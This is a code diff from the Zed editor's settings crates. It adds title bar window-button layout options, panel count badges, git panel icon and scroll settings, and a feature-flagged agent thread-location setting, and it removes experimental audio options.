+#[derive(Clone, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)]
+pub struct OpenCodeAvailableModel {
+ pub name: String,
+ pub display_name: Option<String>,
+ pub max_tokens: u64,
+ pub max_output_tokens: Option<u64>,
+ /// The API protocol to use for this model: "anthropic", "openai_responses", "openai_chat", or "google".
+ pub protocol: String,
+}
+
#[with_fallible_options]
#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)]
pub struct LmStudioSettingsContent {
@@ -9,6 +9,7 @@ mod project;
mod serde_helper;
mod terminal;
mod theme;
+mod title_bar;
mod workspace;
pub use agent::*;
@@ -26,6 +27,7 @@ pub use serde_helper::{
use settings_json::parse_json_with_comments;
pub use terminal::*;
pub use theme::*;
+pub use title_bar::*;
pub use workspace::*;
use collections::{HashMap, IndexMap};
@@ -316,54 +318,10 @@ impl strum::VariantNames for BaseKeymapContent {
];
}
-#[with_fallible_options]
-#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)]
-pub struct TitleBarSettingsContent {
- /// Whether to show the branch icon beside branch switcher in the title bar.
- ///
- /// Default: false
- pub show_branch_icon: Option<bool>,
- /// Whether to show onboarding banners in the title bar.
- ///
- /// Default: true
- pub show_onboarding_banner: Option<bool>,
- /// Whether to show user avatar in the title bar.
- ///
- /// Default: true
- pub show_user_picture: Option<bool>,
- /// Whether to show the branch name button in the titlebar.
- ///
- /// Default: true
- pub show_branch_name: Option<bool>,
- /// Whether to show the project host and name in the titlebar.
- ///
- /// Default: true
- pub show_project_items: Option<bool>,
- /// Whether to show the sign in button in the title bar.
- ///
- /// Default: true
- pub show_sign_in: Option<bool>,
- /// Whether to show the user menu button in the title bar.
- ///
- /// Default: true
- pub show_user_menu: Option<bool>,
- /// Whether to show the menus in the title bar.
- ///
- /// Default: false
- pub show_menus: Option<bool>,
-}
-
/// Configuration of audio in Zed.
#[with_fallible_options]
#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)]
pub struct AudioSettingsContent {
- /// Opt into the new audio system.
- ///
- /// You need to rejoin a call for this setting to apply
- #[serde(rename = "experimental.rodio_audio")]
- pub rodio_audio: Option<bool>, // default is false
- /// Requires 'rodio_audio: true'
- ///
/// Automatically increase or decrease you microphone's volume. This affects how
/// loud you sound to others.
///
@@ -373,35 +331,11 @@ pub struct AudioSettingsContent {
/// compared to other speakers.
#[serde(rename = "experimental.auto_microphone_volume")]
pub auto_microphone_volume: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
- /// Automatically increate or decrease the volume of other call members.
- /// This only affects how things sound for you.
- #[serde(rename = "experimental.auto_speaker_volume")]
- pub auto_speaker_volume: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
/// Remove background noises. Works great for typing, cars, dogs, AC. Does
/// not work well on music.
- #[serde(rename = "experimental.denoise")]
- pub denoise: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
- /// Use audio parameters compatible with the previous versions of
- /// experimental audio and non-experimental audio. When this is false you
- /// will sound strange to anyone not on the latest experimental audio. In
- /// the future we will migrate by setting this to false
- ///
- /// You need to rejoin a call for this setting to apply
- #[serde(rename = "experimental.legacy_audio_compatible")]
- pub legacy_audio_compatible: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
/// Select specific output audio device.
#[serde(rename = "experimental.output_audio_device")]
pub output_audio_device: Option<AudioOutputDeviceName>,
- /// Requires 'rodio_audio: true'
- ///
/// Select specific input audio device.
#[serde(rename = "experimental.input_audio_device")]
pub input_audio_device: Option<AudioInputDeviceName>,
@@ -593,6 +527,17 @@ pub struct GitPanelSettingsContent {
///
/// Default: icon
pub status_style: Option<StatusStyle>,
+
+ /// Whether to show file icons in the git panel.
+ ///
+ /// Default: false
+ pub file_icons: Option<bool>,
+
+ /// Whether to show folder icons or chevrons for directories in the git panel.
+ ///
+ /// Default: true
+ pub folder_icons: Option<bool>,
+
/// How and when the scrollbar should be displayed.
///
/// Default: inherits editor scrollbar settings
@@ -622,8 +567,18 @@ pub struct GitPanelSettingsContent {
/// Whether to show the addition/deletion change count next to each file in the Git panel.
///
- /// Default: false
+ /// Default: true
pub diff_stats: Option<bool>,
+
+ /// Whether to show a badge on the git panel icon with the count of uncommitted changes.
+ ///
+ /// Default: false
+ pub show_count_badge: Option<bool>,
+
+ /// Whether the git panel should open on startup.
+ ///
+ /// Default: false
+ pub starts_open: Option<bool>,
}
#[derive(
@@ -671,6 +626,10 @@ pub struct NotificationPanelSettingsContent {
/// Default: 300
#[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")]
pub default_width: Option<f32>,
+ /// Whether to show a badge on the notification panel icon with the count of unread notifications.
+ ///
+ /// Default: false
+ pub show_count_badge: Option<bool>,
}
#[with_fallible_options]
@@ -721,6 +680,10 @@ pub struct FileFinderSettingsContent {
///
/// Default: Smart
pub include_ignored: Option<IncludeIgnoredContent>,
+ /// Whether to include text channels in file finder results.
+ ///
+ /// Default: false
+ pub include_channels: Option<bool>,
}
#[derive(
@@ -171,6 +171,10 @@ pub struct TerminalSettingsContent {
/// Default: 45
#[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")]
pub minimum_contrast: Option<f32>,
+ /// Whether to show a badge on the terminal panel icon with the count of open terminals.
+ ///
+ /// Default: false
+ pub show_count_badge: Option<bool>,
}
/// Shell configuration to open the terminal with.
@@ -0,0 +1,124 @@
+use gpui::WindowButtonLayout;
+use schemars::{JsonSchema, Schema, SchemaGenerator, json_schema};
+use serde::{Deserialize, Serialize};
+use settings_macros::{MergeFrom, with_fallible_options};
+
+/// The layout of window control buttons as represented by user settings.
+///
+/// Custom layout strings use the GNOME `button-layout` format (e.g.
+/// `"close:minimize,maximize"`).
+#[derive(
+ Clone,
+ PartialEq,
+ Debug,
+ Serialize,
+ Deserialize,
+ JsonSchema,
+ MergeFrom,
+ Default,
+ strum::EnumDiscriminants,
+)]
+#[strum_discriminants(derive(strum::VariantArray, strum::VariantNames, strum::FromRepr))]
+#[schemars(schema_with = "window_button_layout_schema")]
+#[serde(from = "String", into = "String")]
+pub enum WindowButtonLayoutContent {
+ /// Follow the system/desktop configuration.
+ #[default]
+ PlatformDefault,
+ /// Use Zed's built-in standard layout, regardless of system config.
+ Standard,
+ /// A raw GNOME-style layout string.
+ Custom(String),
+}
+
+impl WindowButtonLayoutContent {
+ #[cfg(any(target_os = "linux", target_os = "freebsd"))]
+ pub fn into_layout(self) -> Option<WindowButtonLayout> {
+ use util::ResultExt;
+
+ match self {
+ Self::PlatformDefault => None,
+ Self::Standard => Some(WindowButtonLayout::linux_default()),
+ Self::Custom(layout) => WindowButtonLayout::parse(&layout).log_err(),
+ }
+ }
+
+ #[cfg(not(any(target_os = "linux", target_os = "freebsd")))]
+ pub fn into_layout(self) -> Option<WindowButtonLayout> {
+ None
+ }
+}
+
+fn window_button_layout_schema(_: &mut SchemaGenerator) -> Schema {
+ json_schema!({
+ "anyOf": [
+ { "enum": ["platform_default", "standard"] },
+ { "type": "string" }
+ ]
+ })
+}
+
+impl From<WindowButtonLayoutContent> for String {
+ fn from(value: WindowButtonLayoutContent) -> Self {
+ match value {
+ WindowButtonLayoutContent::PlatformDefault => "platform_default".to_string(),
+ WindowButtonLayoutContent::Standard => "standard".to_string(),
+ WindowButtonLayoutContent::Custom(s) => s,
+ }
+ }
+}
+
+impl From<String> for WindowButtonLayoutContent {
+ fn from(layout_string: String) -> Self {
+ match layout_string.as_str() {
+ "platform_default" => Self::PlatformDefault,
+ "standard" => Self::Standard,
+ _ => Self::Custom(layout_string),
+ }
+ }
+}
+
+#[with_fallible_options]
+#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)]
+pub struct TitleBarSettingsContent {
+ /// Whether to show the branch icon beside branch switcher in the title bar.
+ ///
+ /// Default: false
+ pub show_branch_icon: Option<bool>,
+ /// Whether to show onboarding banners in the title bar.
+ ///
+ /// Default: true
+ pub show_onboarding_banner: Option<bool>,
+ /// Whether to show user avatar in the title bar.
+ ///
+ /// Default: true
+ pub show_user_picture: Option<bool>,
+ /// Whether to show the branch name button in the titlebar.
+ ///
+ /// Default: true
+ pub show_branch_name: Option<bool>,
+ /// Whether to show the project host and name in the titlebar.
+ ///
+ /// Default: true
+ pub show_project_items: Option<bool>,
+ /// Whether to show the sign in button in the title bar.
+ ///
+ /// Default: true
+ pub show_sign_in: Option<bool>,
+ /// Whether to show the user menu button in the title bar.
+ ///
+ /// Default: true
+ pub show_user_menu: Option<bool>,
+ /// Whether to show the menus in the title bar.
+ ///
+ /// Default: false
+ pub show_menus: Option<bool>,
+ /// The layout of window control buttons in the title bar (Linux only).
+ ///
+ /// This can be set to "platform_default" to follow the system configuration, or
+ /// "standard" to use Zed's built-in layout. For custom layouts, use a
+ /// GNOME-style layout string like "close:minimize,maximize".
+ ///
+ /// Default: "platform_default"
+ pub button_layout: Option<WindowButtonLayoutContent>,
+}
@@ -6,8 +6,8 @@ use serde::{Deserialize, Serialize};
use settings_macros::{MergeFrom, with_fallible_options};
use crate::{
- CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity,
- ScrollbarSettingsContent, ShowIndentGuides, serialize_optional_f32_with_two_decimal_places,
+ CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity, ShowIndentGuides,
+ ShowScrollbar, serialize_optional_f32_with_two_decimal_places,
};
#[with_fallible_options]
@@ -710,7 +710,7 @@ pub struct ProjectPanelSettingsContent {
/// Default: true
pub starts_open: Option<bool>,
/// Scrollbar-related settings
- pub scrollbar: Option<ScrollbarSettingsContent>,
+ pub scrollbar: Option<ProjectPanelScrollbarSettingsContent>,
/// Which files containing diagnostic errors/warnings to mark in the project panel.
///
/// Default: all
@@ -793,6 +793,23 @@ pub enum ProjectPanelSortMode {
FilesFirst,
}
+#[with_fallible_options]
+#[derive(
+ Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default,
+)]
+pub struct ProjectPanelScrollbarSettingsContent {
+ /// When to show the scrollbar in the project panel.
+ ///
+ /// Default: inherits editor scrollbar settings
+ pub show: Option<ShowScrollbar>,
+ /// Whether to allow horizontal scrolling in the project panel.
+ /// When false, the view is locked to the leftmost position and
+ /// long file names are clipped.
+ ///
+ /// Default: true
+ pub horizontal_scroll: Option<bool>,
+}
+
#[with_fallible_options]
#[derive(
Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default,
@@ -28,6 +28,7 @@ cpal.workspace = true
edit_prediction.workspace = true
edit_prediction_ui.workspace = true
editor.workspace = true
+feature_flags.workspace = true
fs.workspace = true
futures.workspace = true
fuzzy.workspace = true
@@ -1,3 +1,4 @@
+use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _};
use gpui::{Action as _, App};
use itertools::Itertools as _;
use settings::{
@@ -74,7 +75,7 @@ pub(crate) fn settings_data(cx: &App) -> Vec<SettingsPage> {
terminal_page(),
version_control_page(),
collaboration_page(),
- ai_page(),
+ ai_page(cx),
network_page(),
]
}
@@ -3480,7 +3481,7 @@ fn window_and_layout_page() -> SettingsPage {
]
}
- fn title_bar_section() -> [SettingsPageItem; 9] {
+ fn title_bar_section() -> [SettingsPageItem; 10] {
[
SettingsPageItem::SectionHeader("Title Bar"),
SettingsPageItem::SettingItem(SettingItem {
@@ -3647,6 +3648,122 @@ fn window_and_layout_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::DynamicItem(DynamicItem {
+ discriminant: SettingItem {
+ files: USER,
+ title: "Button Layout",
+ description:
+ "(Linux only) choose how window control buttons are laid out in the titlebar.",
+ field: Box::new(SettingField {
+ json_path: Some("title_bar.button_layout$"),
+ pick: |settings_content| {
+ Some(
+ &dynamic_variants::<settings::WindowButtonLayoutContent>()[settings_content
+ .title_bar
+ .as_ref()?
+ .button_layout
+ .as_ref()?
+ .discriminant()
+ as usize],
+ )
+ },
+ write: |settings_content, value| {
+ let Some(value) = value else {
+ settings_content
+ .title_bar
+ .get_or_insert_default()
+ .button_layout = None;
+ return;
+ };
+
+ let current_custom_layout = settings_content
+ .title_bar
+ .as_ref()
+ .and_then(|title_bar| title_bar.button_layout.as_ref())
+ .and_then(|button_layout| match button_layout {
+ settings::WindowButtonLayoutContent::Custom(layout) => {
+ Some(layout.clone())
+ }
+ _ => None,
+ });
+
+ let button_layout = match value {
+ settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => {
+ settings::WindowButtonLayoutContent::PlatformDefault
+ }
+ settings::WindowButtonLayoutContentDiscriminants::Standard => {
+ settings::WindowButtonLayoutContent::Standard
+ }
+ settings::WindowButtonLayoutContentDiscriminants::Custom => {
+ settings::WindowButtonLayoutContent::Custom(
+ current_custom_layout.unwrap_or_else(|| {
+ "close:minimize,maximize".to_string()
+ }),
+ )
+ }
+ };
+
+ settings_content
+ .title_bar
+ .get_or_insert_default()
+ .button_layout = Some(button_layout);
+ },
+ }),
+ metadata: None,
+ },
+ pick_discriminant: |settings_content| {
+ Some(
+ settings_content
+ .title_bar
+ .as_ref()?
+ .button_layout
+ .as_ref()?
+ .discriminant() as usize,
+ )
+ },
+ fields: dynamic_variants::<settings::WindowButtonLayoutContent>()
+ .into_iter()
+ .map(|variant| match variant {
+ settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => {
+ vec![]
+ }
+ settings::WindowButtonLayoutContentDiscriminants::Standard => vec![],
+ settings::WindowButtonLayoutContentDiscriminants::Custom => vec![
+ SettingItem {
+ files: USER,
+ title: "Custom Button Layout",
+ description:
+ "GNOME-style layout string such as \"close:minimize,maximize\".",
+ field: Box::new(SettingField {
+ json_path: Some("title_bar.button_layout"),
+ pick: |settings_content| match settings_content
+ .title_bar
+ .as_ref()?
+ .button_layout
+ .as_ref()?
+ {
+ settings::WindowButtonLayoutContent::Custom(layout) => {
+ Some(layout)
+ }
+ _ => DEFAULT_EMPTY_STRING,
+ },
+ write: |settings_content, value| {
+ settings_content
+ .title_bar
+ .get_or_insert_default()
+ .button_layout = value
+ .map(settings::WindowButtonLayoutContent::Custom);
+ },
+ }),
+ metadata: Some(Box::new(SettingsFieldMetadata {
+ placeholder: Some("close:minimize,maximize"),
+ ..Default::default()
+ })),
+ },
+ ],
+ })
+ .collect(),
+ }),
]
}
@@ -4238,7 +4355,7 @@ fn window_and_layout_page() -> SettingsPage {
}
fn panels_page() -> SettingsPage {
- fn project_panel_section() -> [SettingsPageItem; 22] {
+ fn project_panel_section() -> [SettingsPageItem; 23] {
[
SettingsPageItem::SectionHeader("Project Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -4516,6 +4633,32 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Horizontal Scroll",
+ description: "Whether to allow horizontal scrolling in the project panel. When disabled, the view is always locked to the leftmost position and long file names are clipped.",
+ field: Box::new(SettingField {
+ json_path: Some("project_panel.scrollbar.horizontal_scroll"),
+ pick: |settings_content| {
+ settings_content
+ .project_panel
+ .as_ref()?
+ .scrollbar
+ .as_ref()?
+ .horizontal_scroll
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .project_panel
+ .get_or_insert_default()
+ .scrollbar
+ .get_or_insert_default()
+ .horizontal_scroll = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
SettingsPageItem::SettingItem(SettingItem {
title: "Show Diagnostics",
description: "Which files containing diagnostic errors/warnings to mark in the project panel.",
@@ -4793,7 +4936,7 @@ fn panels_page() -> SettingsPage {
]
}
- fn terminal_panel_section() -> [SettingsPageItem; 2] {
+ fn terminal_panel_section() -> [SettingsPageItem; 3] {
[
SettingsPageItem::SectionHeader("Terminal Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -4809,6 +4952,28 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Show Count Badge",
+ description: "Show a badge on the terminal panel icon with the count of open terminals.",
+ field: Box::new(SettingField {
+ json_path: Some("terminal.show_count_badge"),
+ pick: |settings_content| {
+ settings_content
+ .terminal
+ .as_ref()?
+ .show_count_badge
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .terminal
+ .get_or_insert_default()
+ .show_count_badge = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
]
}
@@ -5021,7 +5186,7 @@ fn panels_page() -> SettingsPage {
]
}
- fn git_panel_section() -> [SettingsPageItem; 11] {
+ fn git_panel_section() -> [SettingsPageItem; 14] {
[
SettingsPageItem::SectionHeader("Git Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -5163,6 +5328,42 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "File Icons",
+ description: "Show file icons next to the Git status icon.",
+ field: Box::new(SettingField {
+ json_path: Some("git_panel.file_icons"),
+ pick: |settings_content| {
+ settings_content.git_panel.as_ref()?.file_icons.as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .git_panel
+ .get_or_insert_default()
+ .file_icons = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Folder Icons",
+ description: "Whether to show folder icons or chevrons for directories in the git panel.",
+ field: Box::new(SettingField {
+ json_path: Some("git_panel.folder_icons"),
+ pick: |settings_content| {
+ settings_content.git_panel.as_ref()?.folder_icons.as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .git_panel
+ .get_or_insert_default()
+ .folder_icons = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
SettingsPageItem::SettingItem(SettingItem {
title: "Diff Stats",
description: "Whether to show the addition/deletion change count next to each file in the Git panel.",
@@ -5181,6 +5382,28 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Show Count Badge",
+ description: "Whether to show a badge on the git panel icon with the count of uncommitted changes.",
+ field: Box::new(SettingField {
+ json_path: Some("git_panel.show_count_badge"),
+ pick: |settings_content| {
+ settings_content
+ .git_panel
+ .as_ref()?
+ .show_count_badge
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .git_panel
+ .get_or_insert_default()
+ .show_count_badge = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
SettingsPageItem::SettingItem(SettingItem {
title: "Scroll Bar",
description: "How and when the scrollbar should be displayed.",
@@ -5231,7 +5454,7 @@ fn panels_page() -> SettingsPage {
]
}
- fn notification_panel_section() -> [SettingsPageItem; 4] {
+ fn notification_panel_section() -> [SettingsPageItem; 5] {
[
SettingsPageItem::SectionHeader("Notification Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -5296,6 +5519,28 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Show Count Badge",
+ description: "Show a badge on the notification panel icon with the count of unread notifications.",
+ field: Box::new(SettingField {
+ json_path: Some("notification_panel.show_count_badge"),
+ pick: |settings_content| {
+ settings_content
+ .notification_panel
+ .as_ref()?
+ .show_count_badge
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .notification_panel
+ .get_or_insert_default()
+ .show_count_badge = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
]
}
@@ -6793,101 +7038,8 @@ fn collaboration_page() -> SettingsPage {
]
}
- fn experimental_section() -> [SettingsPageItem; 9] {
+ fn audio_settings() -> [SettingsPageItem; 3] {
[
- SettingsPageItem::SectionHeader("Experimental"),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Rodio Audio",
- description: "Opt into the new audio system.",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.rodio_audio"),
- pick: |settings_content| settings_content.audio.as_ref()?.rodio_audio.as_ref(),
- write: |settings_content, value| {
- settings_content.audio.get_or_insert_default().rodio_audio = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Auto Microphone Volume",
- description: "Automatically adjust microphone volume (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.auto_microphone_volume"),
- pick: |settings_content| {
- settings_content
- .audio
- .as_ref()?
- .auto_microphone_volume
- .as_ref()
- },
- write: |settings_content, value| {
- settings_content
- .audio
- .get_or_insert_default()
- .auto_microphone_volume = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Auto Speaker Volume",
- description: "Automatically adjust volume of other call members (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.auto_speaker_volume"),
- pick: |settings_content| {
- settings_content
- .audio
- .as_ref()?
- .auto_speaker_volume
- .as_ref()
- },
- write: |settings_content, value| {
- settings_content
- .audio
- .get_or_insert_default()
- .auto_speaker_volume = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Denoise",
- description: "Remove background noises (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.denoise"),
- pick: |settings_content| settings_content.audio.as_ref()?.denoise.as_ref(),
- write: |settings_content, value| {
- settings_content.audio.get_or_insert_default().denoise = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Legacy Audio Compatible",
- description: "Use audio parameters compatible with previous versions (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.legacy_audio_compatible"),
- pick: |settings_content| {
- settings_content
- .audio
- .as_ref()?
- .legacy_audio_compatible
- .as_ref()
- },
- write: |settings_content, value| {
- settings_content
- .audio
- .get_or_insert_default()
- .legacy_audio_compatible = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
SettingsPageItem::ActionLink(ActionLink {
title: "Test Audio".into(),
description: Some("Test your microphone and speaker setup".into()),
@@ -6948,11 +7100,11 @@ fn collaboration_page() -> SettingsPage {
SettingsPage {
title: "Collaboration",
- items: concat_sections![calls_section(), experimental_section()],
+ items: concat_sections![calls_section(), audio_settings()],
}
}
-fn ai_page() -> SettingsPage {
+fn ai_page(cx: &App) -> SettingsPage {
fn general_section() -> [SettingsPageItem; 2] {
[
SettingsPageItem::SectionHeader("General"),
@@ -6972,8 +7124,8 @@ fn ai_page() -> SettingsPage {
]
}
- fn agent_configuration_section() -> [SettingsPageItem; 12] {
- [
+ fn agent_configuration_section(cx: &App) -> Box<[SettingsPageItem]> {
+ let mut items = vec![
SettingsPageItem::SectionHeader("Agent Configuration"),
SettingsPageItem::SubPageLink(SubPageLink {
title: "Tool Permissions".into(),
@@ -6984,6 +7136,34 @@ fn ai_page() -> SettingsPage {
files: USER,
render: render_tool_permissions_setup_page,
}),
+ ];
+
+ if cx.has_flag::<AgentV2FeatureFlag>() {
+ items.push(SettingsPageItem::SettingItem(SettingItem {
+ title: "New Thread Location",
+ description: "Whether to start a new thread in the current local project or in a new Git worktree.",
+ field: Box::new(SettingField {
+ json_path: Some("agent.new_thread_location"),
+ pick: |settings_content| {
+ settings_content
+ .agent
+ .as_ref()?
+ .new_thread_location
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .agent
+ .get_or_insert_default()
+ .new_thread_location = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }));
+ }
+
+ items.extend([
SettingsPageItem::SettingItem(SettingItem {
title: "Single File Review",
description: "When enabled, agent edits will also be displayed in single-file buffers for review.",
@@ -7188,7 +7368,9 @@ fn ai_page() -> SettingsPage {
metadata: None,
files: USER,
}),
- ]
+ ]);
+
+ items.into_boxed_slice()
}
fn context_servers_section() -> [SettingsPageItem; 2] {
@@ -7273,7 +7455,7 @@ fn ai_page() -> SettingsPage {
title: "AI",
items: concat_sections![
general_section(),
- agent_configuration_section(),
+ agent_configuration_section(cx),
context_servers_section(),
edit_prediction_language_settings_section(),
edit_prediction_display_sub_section()
@@ -88,7 +88,7 @@ fn start_test_playback(
}
};
- let Ok(output) = audio::open_output_stream(output_device_id) else {
+ let Ok(output) = audio::open_test_output(output_device_id) else {
log::error!("Could not open output device for audio test");
return;
};
@@ -99,8 +99,7 @@ pub(crate) fn render_edit_prediction_setup_page(
IconName::AiOpenAiCompat,
"OpenAI Compatible API",
ApiKeyDocs::Custom {
- message: "Set an API key here. It will be sent as Authorization: Bearer {key}."
- .into(),
+ message: "The API key sent as Authorization: Bearer {key}.".into(),
},
open_ai_compatible_api_token(cx),
|cx| open_ai_compatible_api_url(cx),
@@ -172,10 +171,12 @@ fn render_provider_dropdown(window: &mut Window, cx: &mut App) -> AnyElement {
h_flex()
.pt_2p5()
.w_full()
+ .min_w_0()
.justify_between()
.child(
v_flex()
.w_full()
+ .min_w_0()
.max_w_1_2()
.child(Label::new("Provider"))
.child(
@@ -246,13 +247,15 @@ fn render_api_key_provider(
.no_padding(true);
let button_link_label = format!("{} dashboard", title);
let description = match docs {
- ApiKeyDocs::Custom { message } => h_flex().min_w_0().gap_0p5().child(
+ ApiKeyDocs::Custom { message } => div().min_w_0().w_full().child(
Label::new(message)
.size(LabelSize::Small)
.color(Color::Muted),
),
ApiKeyDocs::Link { dashboard_url } => h_flex()
+ .w_full()
.min_w_0()
+ .flex_wrap()
.gap_0p5()
.child(
Label::new("Visit the")
@@ -300,10 +303,12 @@ fn render_api_key_provider(
h_flex()
.pt_2p5()
.w_full()
+ .min_w_0()
.justify_between()
.child(
v_flex()
.w_full()
+ .min_w_0()
.max_w_1_2()
.child(Label::new("API Key"))
.child(description)
@@ -466,7 +471,7 @@ fn ollama_settings() -> Box<[SettingsPageItem]> {
}),
SettingsPageItem::SettingItem(SettingItem {
title: "Prompt Format",
- description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name",
+ description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name.",
field: Box::new(SettingField {
pick: |settings| {
settings
@@ -597,7 +602,7 @@ fn open_ai_compatible_settings() -> Box<[SettingsPageItem]> {
}),
SettingsPageItem::SettingItem(SettingItem {
title: "Prompt Format",
- description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name",
+ description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name.",
field: Box::new(SettingField {
pick: |settings| {
settings
@@ -249,10 +249,13 @@ fn render_tool_list_item(
h_flex()
.w_full()
+ .min_w_0()
.py_3()
.justify_between()
.child(
v_flex()
+ .w_full()
+ .min_w_0()
.child(h_flex().gap_1().child(Label::new(tool.name)).when_some(
rule_summary,
|this, summary| {
@@ -275,10 +278,11 @@ fn render_tool_list_item(
.tab_index(tool_index as isize)
.style(ButtonStyle::OutlinedGhost)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronRight)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ChevronRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(move |this, _, window, cx| {
this.push_dynamic_sub_page(
tool_name,
@@ -1071,9 +1075,12 @@ fn render_global_default_mode_section(current_mode: ToolPermissionMode) -> AnyEl
h_flex()
.my_4()
+ .min_w_0()
.justify_between()
.child(
v_flex()
+ .w_full()
+ .min_w_0()
.child(Label::new("Default Permission"))
.child(
Label::new(
@@ -1090,9 +1097,7 @@ fn render_global_default_mode_section(current_mode: ToolPermissionMode) -> AnyEl
.tab_index(0_isize)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronDown)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small),
+ .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)),
)
.menu(move |window, cx| {
Some(ContextMenu::build(window, cx, move |menu, _, _| {
@@ -1126,13 +1131,18 @@ fn render_default_mode_section(
let tool_id_owned = tool_id.to_string();
h_flex()
+ .min_w_0()
.justify_between()
.child(
- v_flex().child(Label::new("Default Action")).child(
- Label::new("Action to take when no patterns match.")
- .size(LabelSize::Small)
- .color(Color::Muted),
- ),
+ v_flex()
+ .w_full()
+ .min_w_0()
+ .child(Label::new("Default Action"))
+ .child(
+ Label::new("Action to take when no patterns match.")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
)
.child(
PopoverMenu::new(format!("default-mode-{}", tool_id))
@@ -1141,9 +1151,7 @@ fn render_default_mode_section(
.tab_index(0_isize)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronDown)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small),
+ .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)),
)
.menu(move |window, cx| {
let tool_id = tool_id_owned.clone();
@@ -1413,6 +1421,9 @@ mod tests {
// Subagent permission checks happen at the level of individual
// tool calls within the subagent, not at the spawning level.
"spawn_agent",
+ // update_plan updates UI-visible planning state but does not use
+ // tool permission rules.
+ "update_plan",
];
let tool_info_ids: Vec<&str> = TOOLS.iter().map(|t| t.id).collect();
@@ -392,29 +392,22 @@ pub fn init(cx: &mut App) {
let queue = ProjectSettingsUpdateQueue::new(cx);
cx.set_global(queue);
+ cx.on_action(|_: &OpenSettings, cx| {
+ open_settings_editor(None, None, None, cx);
+ });
+
cx.observe_new(|workspace: &mut workspace::Workspace, _, _| {
workspace
- .register_action(
- |workspace, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| {
- let window_handle = window
- .window_handle()
- .downcast::<MultiWorkspace>()
- .expect("Workspaces are root Windows");
